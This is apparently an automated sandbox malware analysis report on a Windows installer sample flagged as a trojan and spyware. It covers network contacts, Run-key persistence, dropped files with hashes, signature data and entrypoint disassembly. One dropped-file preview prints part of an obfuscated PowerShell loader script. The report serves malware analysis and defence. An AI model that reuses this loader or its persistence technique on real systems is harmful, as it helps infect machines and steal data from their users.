https://github.com/Pester/Pester	powershell.exe, 00000003.00000002.438796688.0000000004E1F000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.251.2.102	drive.google.com	United States	15169	GOOGLEUS	false
142.251.2.132	googlehosted.l.googleusercontent.com	United States	15169	GOOGLEUS	false
212.44.101.105	mail.saw.si	Slovenia	43128	DHH-ASSI	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	38.0.0 Beryl
Analysis ID:	1304978
Start date and time:	2023-09-07 09:28:20 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 14m 59s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	30
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	demand_rpkb_060923.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@12/14@3/4
EGA Information:	Successful, ratio: 66.7%
HDC Information:	Failed
HCA Information:	Successful, ratio: 99% Number of executed functions: 101 Number of non-executed functions: 32
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
Excluded IPs from analysis (whitelisted): 8.252.198.254, 8.249.47.254, 8.252.202.254, 67.27.1.254, 8.253.129.66, 8.252.181.126, 8.252.72.254, 8.252.182.126, 8.252.18.254, 8.249.49.254, 8.251.37.254, 8.252.71.254, 8.251.31.254
Excluded domains from analysis (whitelisted): kv601.prod.do.dsp.mp.microsoft.com, ris.api.iris.microsoft.com, geover.prod.do.dsp.mp.microsoft.com, client.wns.windows.com, fg.download.windowsupdate.com.c.footprint.net, fs.microsoft.com, geo.prod.do.dsp.mp.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com, wu-bg-shim.trafficmanager.net
Execution Graph export aborted for target powershell.exe, PID 6328 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: demand_rpkb_060923.exe

Simulations

Behavior and APIs

Time	Type	Description
00:31:11	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Myapp C:\Users\user\AppData\Roaming\Myapp\Myapp.exe
00:31:19	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Myapp C:\Users\user\AppData\Roaming\Myapp\Myapp.exe
09:29:17	API Interceptor	127x Sleep call for process: powershell.exe modified
09:31:11	API Interceptor	57x Sleep call for process: CasPol.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
DHH-ASSI	CX17SY6xF6.exe	Get hash	malicious	Pushdo	Browse	212.44.102.57
	PIyT9A3jfC.exe	Get hash	malicious	Pushdo	Browse	212.44.102.57
	nhVJ8J5qOt.exe	Get hash	malicious	Pushdo	Browse	212.44.102.57
	SN74HCT541DWR.exe	Get hash	malicious	AgentTesla	Browse	212.44.112.42
	6gjnnBAbpc.exe	Get hash	malicious	Pushdo	Browse	212.44.102.57
	iJzpyjAehB.exe	Get hash	malicious	Pushdo	Browse	212.44.102.57
	rLDmqbpt5D.exe	Get hash	malicious	Pushdo, DanaBot, RedLine, SmokeLoader	Browse	212.44.102.57
	3ts2As2Bkm.exe	Get hash	malicious	Unknown	Browse	212.44.102.57
	https://digital.mps.controllodianagrafici.eu/pri/login/	Get hash	malicious	Unknown	Browse	212.44.101.98
	SecuriteInfo.com.W32.AIDetectNet.01.9864.exe	Get hash	malicious	AgentTesla	Browse	212.44.113.16
	SecuriteInfo.com.W32.AIDetectNet.01.28239.exe	Get hash	malicious	AgentTesla	Browse	212.44.113.16
	DOC_BANK.EXE	Get hash	malicious	Nanocore AgentTesla	Browse	212.44.102.209
	iSBX2z1os7.exe	Get hash	malicious	Unknown	Browse	212.44.102.57
	xwKdahKPn8.exe	Get hash	malicious	HTMLPhisher	Browse	212.44.102.57
	z2xQEFs54b.exe	Get hash	malicious	HTMLPhisher	Browse	212.44.102.57
	990109.exe	Get hash	malicious	HTMLPhisher	Browse	212.44.102.57
	3yhnaDfaxn.exe	Get hash	malicious	HTMLPhisher	Browse	212.44.102.57
	Swift_TYD-2020#U00b7pdf.exe	Get hash	malicious	GuLoader	Browse	212.44.101.107
	Obavestenje o prilivu za 160007770978367467267#U00b7pdf.exe	Get hash	malicious	GuLoader	Browse	212.44.101.107
	Obavestenje o prilivu za 160006660978367467267#U00c2#U00b7pdf.exe	Get hash	malicious	GuLoader	Browse	212.44.101.107

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	DHL_PRENDAS_Pre-Embarque_32PM4433.scr.exe	Get hash	malicious	GuLoader, Remcos	Browse	142.251.2.132 142.251.2.102
	RJN5qFjb95.exe	Get hash	malicious	Vidar	Browse	142.251.2.132 142.251.2.102
	RqXqfpjysb.xls	Get hash	malicious	Hidden Macro 4.0	Browse	142.251.2.132 142.251.2.102
	IfTxJe26z7.xls	Get hash	malicious	Hidden Macro 4.0	Browse	142.251.2.132 142.251.2.102
	HYzdAkcSs4.xls	Get hash	malicious	Hidden Macro 4.0	Browse	142.251.2.132 142.251.2.102
	file.exe	Get hash	malicious	Vidar	Browse	142.251.2.132 142.251.2.102
	file.exe	Get hash	malicious	RedLine, Stealc	Browse	142.251.2.132 142.251.2.102
	kscwNvsIdn.exe	Get hash	malicious	Fabookie	Browse	142.251.2.132 142.251.2.102
	kscwNvsIdn.exe	Get hash	malicious	Fabookie	Browse	142.251.2.132 142.251.2.102
	PCSecureBrowser.exe	Get hash	malicious	Unknown	Browse	142.251.2.132 142.251.2.102
	20CIL8ZeGf.exe	Get hash	malicious	GuLoader	Browse	142.251.2.132 142.251.2.102
	WP8vT3auAy.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, RedLine, SmokeLoader, Vidar	Browse	142.251.2.132 142.251.2.102
	fsq0XcPhGK.exe	Get hash	malicious	Vidar	Browse	142.251.2.132 142.251.2.102
	OfYNxlFF4f.exe	Get hash	malicious	Vidar, onlyLogger	Browse	142.251.2.132 142.251.2.102
	5j2MysSt5Z.exe	Get hash	malicious	Babuk, Djvu	Browse	142.251.2.132 142.251.2.102
	majzCI9Dxh.exe	Get hash	malicious	Vidar, onlyLogger	Browse	142.251.2.132 142.251.2.102
	Ysb0DNvzGm.exe	Get hash	malicious	Vidar, onlyLogger	Browse	142.251.2.132 142.251.2.102
	file.exe	Get hash	malicious	Djvu, RedLine, SmokeLoader	Browse	142.251.2.132 142.251.2.102
	mgtq5agGDy.exe	Get hash	malicious	GuLoader, Lokibot	Browse	142.251.2.132 142.251.2.102
	file.exe	Get hash	malicious	RedLine	Browse	142.251.2.132 142.251.2.102

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
C:\Users\user\AppData\Roaming\Myapp\Myapp.exe	file.exe	Get hash	malicious	RedLine	Browse

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
File Type:	data
Category:	modified
Size (bytes):	330
Entropy (8bit):	3.4094151917117435
Encrypted:	false
SSDEEP:	6:kKF88U8A0N+SkQlPlEGYRMY9z+4KlDA3RUeoMmlb:tTArkPlE99SNxAhUeor
MD5:	BA61DC3F2FE6E3F22473873D31DC6D9E
SHA1:	2FD5725C6D5167C6C8DD69099928B369C5F77D8C
SHA-256:	9F78DD29B2B0577638AB591E5472210783A5E7E5F119962523DCFFD9DBBE1232
SHA-512:	D7BBFC6FA6DC2BE69071AA6F7C46053E83F9DD5A557F7EE735BB4021A980CDE891D0A625AE48E58D30992137EAC9BE794E589B4352685E35E514FE01D8BC7424
Malicious:	false
Preview:	p...... ........`pR.c...(..................................................\... ........?:.".......(...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".6.0.6.7.8.6.d.1.2.2.d.5.d.9.1.:.0."...

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Myapp.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\Myapp\Myapp.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	42
Entropy (8bit):	4.0050635535766075
Encrypted:	false
SSDEEP:	3:QHXMKa/xwwUy:Q3La/xwQ
MD5:	84CFDB4B995B1DBF543B26B86C863ADC
SHA1:	D2F47764908BF30036CF8248B9FF5541E2711FA2
SHA-256:	D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
SHA-512:	485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	8003
Entropy (8bit):	4.842774286652891
Encrypted:	false
SSDEEP:	192:Jxoe5FVsm5emdgdVFn3eGOVpN6K3bkkjo5igkjDt4iWN3yBGHc9smgdcU6CupO0P:1EdVoGIpN6KQkj2Zkjh4iUxepib4J
MD5:	62F0B7274EE33977F05FE8727590EBA4
SHA1:	3D7D56215FAF3C0F11BBF6A16ABB09DF83E96BA7
SHA-256:	A59280899B286228ABA87CAC2EED2C3FEA4966BF427899B9B9AEF46AD0FD3E00
SHA-512:	001B11A26D8AF5D8FEE3B259D5E10EAA22801662C539BA70B7EBA0A330C9DD1B4F0CFB3B05B0B63CDA103B771506CF7A35A581DF7986E872A187E2E280D5493C
Malicious:	false
Preview:	PSMODULECACHE.............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script................T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1272
Entropy (8bit):	5.395358758348303
Encrypted:	false
SSDEEP:	24:3A1IQdo4KAxFhOUqKep0FN15qRPXd6Zs9tOK5F8P4HrCVbu:yBi4rrqB0F5qRvdn9tOqF8iWVbu
MD5:	672EC488CDC556F5CC52917485441F97
SHA1:	BF19ADBEC27FC9AA7F332F198DB6FEA62F7278D0
SHA-256:	BDE2F563C38FC1B581B14880E9771D3058C86B5DD3BF5128900DAD71A23E7630
SHA-512:	14BF8A968E9655B94CC15A2219B6A3A62B0FEC47B9C9D075C28A87AABD8FBC0C4AB1C483EC739BB27C3C237E0F6920F1ACD9818B07CF81F888C57C2CC0D45EEA
Malicious:	false
Preview:	@...e...............................7................@..........P...............-K..s.F...]`.,......(.Microsoft.PowerShell.Commands.ManagementH...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0................UW...F.}.A..x........System..4...............A{....L..-............System.Core.D...............fZve...F.....x.)........System.Management.Automation<.....................N...>m..>........System.Management...@...............$TRE..&D.#.t.c%A........System.DirectoryServices<.................hr..B.....w.O........System.Configuration4................ .v'#-N....M..d........System.Xml..4...................v.A.Z...W.1........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8....................@.Z:.h...........System.Numerics.<.................&M ..E..;............System.Transactions.D.....................G..H.).7.........System.Configuration.Ins

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ino2belk.hky.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_preo1yfn.xtd.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w0moo13g.jnc.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y2j4ytkz.yam.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\epicentrummers\Eleve\Naturfredningsforeningerne6\Breddes.Byg

Download File

Process:	C:\Users\user\Desktop\demand_rpkb_060923.exe
File Type:	data
Category:	dropped
Size (bytes):	410259
Entropy (8bit):	7.509755854392565
Encrypted:	false
SSDEEP:	6144:sMjeCux23qfoxxEIV/eP3cNpEd0cqjBf65lYEOwxVCkhRqobLYgQ8VVj:RaAqfo7hesEd0cyfzEOwxVVhktLmVj
MD5:	87059A60B582AC0A9615D9FA03FDC6FB
SHA1:	6F92095364DF6B049E006F502B82F30FF09C3D20
SHA-256:	3DEAC6EE49131498DED6B896A67AF3094C610B172A2CAA6E11AD92B52A1638CD
SHA-512:	877FAF1CE84D8F73E1A30397C9805932C8ACB64BF4C53E5A31395A8750A93AFE7DC4A238AA419A4F347EEB0FDD2D4335BBD9F9F9883AD4A62CCFBF5B0B04EC90
Malicious:	false
Preview:	..6..................999..................I.....#......3.HHHH......JJ.......8.............RRR....(......S......!!............./.............................................................M..bb...............................((........................x............UU.....3......vv.....j.~~..............K........@........m...............EE.........TTTTTTT.M.X.{{........TT.KK.....y....................SSSS..................___.......A...................N.................Y...E......TT.....x...........XX..33..................................~~~~............FF..._....................33............??...............................................%...............N.......M.@....................PPPP.cccc............!.....i...%..*..L...........888................^.9..1...FF.....................VV...................9....vv....r...........S........0....[.^..............................ss.,,......00.....aaaa..._.........u..00........000000................^^............ee....................gg.......

C:\Users\user\AppData\Local\Temp\epicentrummers\Eleve\Naturfredningsforeningerne6\Cykels235.Sil

Download File

Process:	C:\Users\user\Desktop\demand_rpkb_060923.exe
File Type:	ASCII text, with very long lines (24638), with no line terminators
Category:	dropped
Size (bytes):	24638
Entropy (8bit):	5.5117395316687725
Encrypted:	false
SSDEEP:	768:7ggPzDqtkTBwzuVamO4xoV1T/rGDg4g645:UIs4BbVaGxoVig4w
MD5:	CF7A7B05CE0D5A8785E7B38F34E80825
SHA1:	9BF66894E2872D1AF9D532766F1D158E7FBD6B40
SHA-256:	D1E36DC59D66607FA0DCF2128C87A023E7B761B422F564C3193243B1E7AD1F62
SHA-512:	24C7103C807E0D5783D9C6A0D2699820D88E320F4EA38FA64550CCDB9DD7E58DD0007EDE48C8CBBD0D2584C463B7B41F2910BF3B18F45D37BB71F47BD9B6664A
Malicious:	false
Preview:	dir;$Unhappiness = """Pr;PaFreuEkn RcfotKliSeoNun C CoB HaBusReespnAseRhsFusun0Ri4Ma Ba{Tr Pa Ep Un UpUnaCyrStalimCa(An[DaSPitLnrBliInnRegTr]Es`$PaTraa RcWyhRtyTrgGreUnnAle GsSkiDrs B)Su;Dr Aa Sp un Gr`$ CPNeaGetAnrKuiEllDoaJutbaeMerDiaqul B Br=Cl GeN SeBawBe- BO CbStjCaecacBlteu Beb myUntKieEk[ud] M Ep(Ta`$SoT Pa KcSuhInySugJeeBonOne PsDiiDisSi.UnLRae Ln TgTitBohEj S/Ge Sk2Ca)Ha;Be Po Sk Fr OpFAvoHerUb( U`$ PJUdiKamPrcIsrLaaUic Dk V= B0Ls; E Co`$ExJPoi hmExcSrrIna IcSik W In-TalhatSu Un`$ ST FaExcLeh SyOpgReeSan ReFosUniCrs K.RoLAneUtnFigEmtGrhDi;Od Un`$uhJLiiSpmOvcSnrTsaUlc skDe+Sk=De2tr)Sp{Pe.Me.Fo`$GlEDakSas HkAnoHanTegJoe ArShnFoehasSk Bl= K Pr`$GaTDeaHycTihFlyPagJueTinSueTjsThi SsTi.OpS FuCobmesDotEcrSiiVanFrgDe( S`$ FJPaiAkmElcHorLiaBocBokSp,Hi Sk2Do)Pa;Ge St be Fe Go De su Tr Pa`$RuPGra TtZyrLaiSalGrafotshegrrChaopl e[Ne`$PaJPriNem CcPrrInaRgcTykCl/Fo2Un] S In=Sy F[BacReoStn GvKaePorRetVi]In:Co:PaTtooflB MySitKyeGa(Ti`$ViE UkHis HkDioTon Mgsye GrannCieupsSe,Vi Wh1Ra6Se) U; R

C:\Users\user\AppData\Local\Temp\epicentrummers\Eleve\Naturfredningsforeningerne6\efterladenskaber.nom

Download File

Process:	C:\Users\user\Desktop\demand_rpkb_060923.exe
File Type:	data
Category:	modified
Size (bytes):	406
Entropy (8bit):	7.394355276866098
Encrypted:	false
SSDEEP:	12:WRQG5f185Fibd+hb8j+mcDGZvcG5QJPZeHnJ:pW1oFibd+hYifCZvcG5qgHnJ
MD5:	BF49D64B0C07F0C5BF32CF0463044689
SHA1:	CDA14A52700A19CDC1256431751900D2AD22FF2F
SHA-256:	C340018A1F7A41C38D7E26A6CFA5874B568F2F0976C9D3FAC58557442EC928C5
SHA-512:	11A704E13CB98EF5AA6778664E254EB768AABBA9138AE49A04A3B47F536A78BC7C69D95303BA32ED47CD74F78B9F5D9BD7FA6F30844E02C104B8CF7B033DCF2B
Malicious:	false
Preview:	.>...s<R.!..M {.B..B...X.c_.x.-..'{....2.xczEc).....r@..I.Z.g..Ea.;..:6s.^.z......u..:....R.....tc.6..<$.]...q..i.P..>..d)\.3....FeS..l&...0....K&.*.5\|WE.W...0W..".~.g..r.....i..]..\|K>.6......n.W.....@...J\...>.`....!..Q@.K..?aHk7.]...%r..\|...<.d9.)x...{...t.W.4/...0.....=-..4UU&.7..:&.....@.".s.YS[.p...=.....`w.U...H.p.P......LW?..Q...tz.......'..v..p.1t8..=..H.>:.t^.X..\|.'....:RF.pH..

C:\Users\user\AppData\Roaming\Myapp\Myapp.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	107704
Entropy (8bit):	5.874324813474553
Encrypted:	false
SSDEEP:	1536:vSF7vA1hRqHNxxMjlI3ZC+0CtOss6mdcT6A4vQ+G1RWHzEP+2Bg:MA1hYPMUs6mdcOA4vQZRWHzEm7
MD5:	8AD6D0D81FEC2856B8DCABEE8D678F61
SHA1:	0B2ABC3C87248F6EF9AF21EBE451933119ECF072
SHA-256:	831E937BB8367F2E8A353295AD0AE55C3EC8D5D2C18AC114383623D564BADE84
SHA-512:	B727641AACD0998483637A6F693A43D253480606474195C625711F4D6E2A9635484C49AF1BE466B0F20F8A86B2053974602EF46C1F986678F70A70EB5328EB33
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...jn.\..............0..X...........v... ........@.. ...............................(....`.................................\v..O.......$............f...>..........$u............................................... ............... ..H............text....V... ...X.................. ..`.rsrc...$............Z..............@..@.reloc...............d..............@..B.................v......H.......(...................xE..$t......................................2~P....o.....r...p(....VrK..p(....s.....P...*..0.._.......~....:O....>.....%.rm..p...A...s......su....%.r...p...A...s....rm..p.su....%.r...p...B...s......su....%.r...p...B...s....r...p.su....%.r...p...C...s......su....%.r...p...C...s....r...p.su....%.r...p...D...s......su....%.r...p...D...s....r...p.su....%.r...p...E...s......su....%..r...p...E...s....r...p.su....%..r...p...F...s......su....%..r...p...F

\Device\ConDrv

Download File

Process:	C:\Users\user\AppData\Roaming\Myapp\Myapp.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	486
Entropy (8bit):	5.059319240651901
Encrypted:	false
SSDEEP:	12:z30OZ30sTBFNY8fNFquci7S1pE+DPOCN6+QOH5JyY:z3nZ3rTDO4UE+Tz5JB
MD5:	26937FCBC07AFC6EF2956B356103E897
SHA1:	51A558B28CA525D52BFA9E059CFDD2D8B6B33E93
SHA-256:	44DEF3D6423C68D49485FC229DC5E3D3A89F1BBB79C21272E28413EC160D32F5
SHA-512:	4C071F9D3CB5B0A3A5A7B694D4508FBFB71B2E87CA23D1A15E7665B10AA2D58FBC9202285DA0B9D6346CF0A622D4EE43EA4F0627278F8EB0FCEC3A6966DEBB8D
Malicious:	false
Preview:	Microsoft .NET Framework CasPol 4.8.3761.0..for Microsoft .NET Framework version 4.8.3761.0..Copyright (C) Microsoft Corporation. All rights reserved.....WARNING: The .NET Framework does not apply CAS policy by default. Any settings shown or modified by CasPol will only ..affect applications that opt into using CAS policy. ....Please see http://go.microsoft.com/fwlink/?LinkId=131738 for more information. ......ERROR: Not enough arguments....For usage information, use 'caspol -?'..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.91659871816928
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	demand_rpkb_060923.exe
File size:	472'200 bytes
MD5:	c7bd1de1f231ca867f35d645d92c587e
SHA1:	6d2d2df2a433e67017237b5f9aed2227bbab54b7
SHA256:	746a52210f0e6b3a28112894f604673c11c053b744075656d46141f98d06133a
SHA512:	18e7ac23f015fe1f5f79ae095d2d7660413c953fe1b56e58de8916114b93dc73a35f5d3d847fda612cb8516a10c5f922d1414311d1fc6bce265e8a10d4d858ee
SSDEEP:	12288:30JI+8FhzcW96cp8N1853t0E2dWnOQ+f7yNqClFzTsb:s83zcW96mG1c+59Q+f7iTlFzo
TLSH:	33A42342FD10FABBC5920A743DB52691FB78808C68F014573B183EADBE05CDA566F25B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG._...PG..PF.IPG._...PG..sw..PG..VA..PG.Rich.PG.........PE..L...".$_.................f...\|......H3............@

File Icon


Icon Hash:	1731713129715597

Static PE Info

General

Entrypoint:	0x403348
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x5F24D722 [Sat Aug 1 02:44:50 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	ced282d9b261d1462772017fe2f6972b

Authenticode Signature

Signature Valid:	false
Signature Issuer:	E=Sovevognen@Ringbolt.ov, OU="Fejltilslutning Surprisedly ", O=Perimetrically, L=Corte Madera, S=California, C=US
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	9/16/2022 1:52:51 AM 9/15/2025 1:52:51 AM
Subject Chain	E=Sovevognen@Ringbolt.ov, OU="Fejltilslutning Surprisedly ", O=Perimetrically, L=Corte Madera, S=California, C=US
Version:	3
Thumbprint MD5:	437C6ABA290D3DB1735180637DC19DF9
Thumbprint SHA-1:	2A25F3324D80706E919305D2D0F9E079D245FC64
Thumbprint SHA-256:	A69AE015A3B8326E945D5997E2AA3F0C2886957DF6EFB0F1EB465214760BEB8C
Serial:	61ED0B642AA95FB43C4EEEF24C88F9BD09998220

Entrypoint Preview

Instruction
sub esp, 00000184h
push ebx
push esi
push edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 0040A198h
mov dword ptr [esp+20h], ebx
mov byte ptr [esp+14h], 00000020h
call dword ptr [004080B8h]
call dword ptr [004080BCh]
and eax, BFFFFFFFh
cmp ax, 00000006h
mov dword ptr [0042F42Ch], eax
je 00007FB7593F53A3h
push ebx
call 00007FB7593F8506h
cmp eax, ebx
je 00007FB7593F5399h
push 00000C00h
call eax
mov esi, 004082A0h
push esi
call 00007FB7593F8482h
push esi
call dword ptr [004080CCh]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], bl
jne 00007FB7593F537Dh
push 0000000Bh
call 00007FB7593F84DAh
push 00000009h
call 00007FB7593F84D3h
push 00000007h
mov dword ptr [0042F424h], eax
call 00007FB7593F84C7h
cmp eax, ebx
je 00007FB7593F53A1h
push 0000001Eh
call eax
test eax, eax
je 00007FB7593F5399h
or byte ptr [0042F42Fh], 00000040h
push ebp
call dword ptr [00408038h]
push ebx
call dword ptr [00408288h]
mov dword ptr [0042F4F8h], eax
push ebx
lea eax, dword ptr [esp+38h]
push 00000160h
push eax
push ebx
push 00429850h
call dword ptr [0040816Ch]
push 0040A188h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8544	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x41000	0x10f00	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x71258	0x2230
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
